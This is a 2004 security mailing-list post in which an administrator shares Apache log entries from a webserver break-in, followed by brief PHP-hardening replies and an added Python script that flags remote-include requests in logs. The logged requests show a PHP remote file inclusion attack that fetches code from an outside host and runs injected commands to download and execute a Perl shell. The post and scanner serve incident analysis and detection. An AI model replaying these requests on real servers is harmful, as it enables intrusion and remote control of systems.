Security Incidents mailing list archives
Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)
From: "nathan c. dickerson" <nathan () pro net>
Date: Tue, 13 Jul 2004 16:52:23 -0700
Just one correction, I said the logs were useless.. that's not quite true.

66.119.34.39 - - [06/Jul/2004:17:47:05 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/var/tmp/...;perl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:17 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20//dev/shm;perl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:19 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20shell.pl HTTP/1.1" 200 10136
66.119.34.39 - - [06/Jul/2004:17:47:33 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:47:40 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wget%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 10479
66.119.34.39 - - [06/Jul/2004:17:48:23 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wget%20http://members.lycos.co.uk/lotsen5k/shell.pl HTTP/1.1" 200 10068
66.119.34.39 - - [06/Jul/2004:17:48:30 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10084
66.119.34.39 - - [06/Jul/2004:17:48:37 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20shhell.pl HTTP/1.1" 200 10137
66.119.34.39 - - [06/Jul/2004:17:48:51 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20shell.pl HTTP/1.1" 200 10068
66.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20.shell HTTP/1.1" 200 10134
66.119.34.39 - - [08/Jul/2004:20:13:59 -0700] "GET /favicon.ico HTTP/1.1" 404 298
66.119.34.39 - - [08/Jul/2004:20:14:03 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10084
66.119.34.39 - - [08/Jul/2004:20:14:10 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;wget%20http://members.lycos.co.uk/lotsen5k/.shell HTTP/1.1" 200 10473
66.119.34.39 - - [08/Jul/2004:20:14:15 -0700] "GET /index.php?PAGE=http://input.crackrock.cc/all/hkz.txt?&cmd=cd%20/dev/shm;perl%20.shell HTTP/1.1" 200 10068

I can sleep well tonight,
Nathan

Dmitry Alyabyev wrote:
> On Saturday 10 July 2004 04:40, Tim Greer wrote:
> [skip]
>> Sounds like one of the many PHP scripts is exploitable. You could run PHP as CGI w/ the suexec wrapper (and even tweak the source or use an existing patch so PHP scripts don't need to be modified at all (other than the ownership of some files/dirs PHP scripts need to use/write to).
>
> not really - you will lose authentication within PHP scripts in meaning of receiving password via environment and some add-ons like Zend optimizer will stop working
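
The request pattern in the log excerpt above (a query parameter whose value is itself a remote URL, followed by a second parameter) can be searched for across an access log. This is an added example, not part of the original message; the function names and the sample lines (documentation addresses, an `.invalid` host) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Apache common log format: host ident user [time] "METHOD target PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def parse_query(target):
    """Split the query on '&' only, so a ';' inside a value is preserved."""
    params = {}
    for pair in urlsplit(target).query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            params[unquote(name)] = unquote(value)  # decode %xx before matching
    return params

def find_remote_includes(lines):
    """Flag requests where any query parameter value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line
        host, when, _method, target, status = m.groups()
        params = parse_query(target)
        for name, value in params.items():
            if REMOTE_RE.match(value):
                findings.append({
                    "client": host, "time": when, "param": name,
                    "remote_url": value,
                    "served": status == "200",  # 200 means the script ran
                    # remaining parameters, decoded, for triage
                    "other_params": {k: v for k, v in params.items() if k != name},
                })
    return findings

# Constructed sample lines, not taken from the original message
SAMPLE = [
    '192.0.2.10 - - [06/Jul/2004:17:47:33 -0700] "GET /index.php?PAGE=http://files.example.invalid/a.txt?&cmd=cd%20/dev/shm;ls HTTP/1.1" 200 10068',
    '192.0.2.10 - - [06/Jul/2004:17:47:40 -0700] "GET /favicon.ico HTTP/1.1" 404 298',
    '198.51.100.7 - - [06/Jul/2004:17:50:01 -0700] "GET /index.php?PAGE=news HTTP/1.1" 200 5120',
    '198.51.100.7 - - [06/Jul/2004:17:51:00 -0700] "GET /view.php?file=http%3A%2F%2Ffiles.example.invalid%2Fb.txt HTTP/1.0" 404 312',
]

if __name__ == "__main__":
    for finding in find_remote_includes(SAMPLE):
        print(finding)
```

Only GET parameters reach the access log, so the same pattern sent in a POST body would not be found this way.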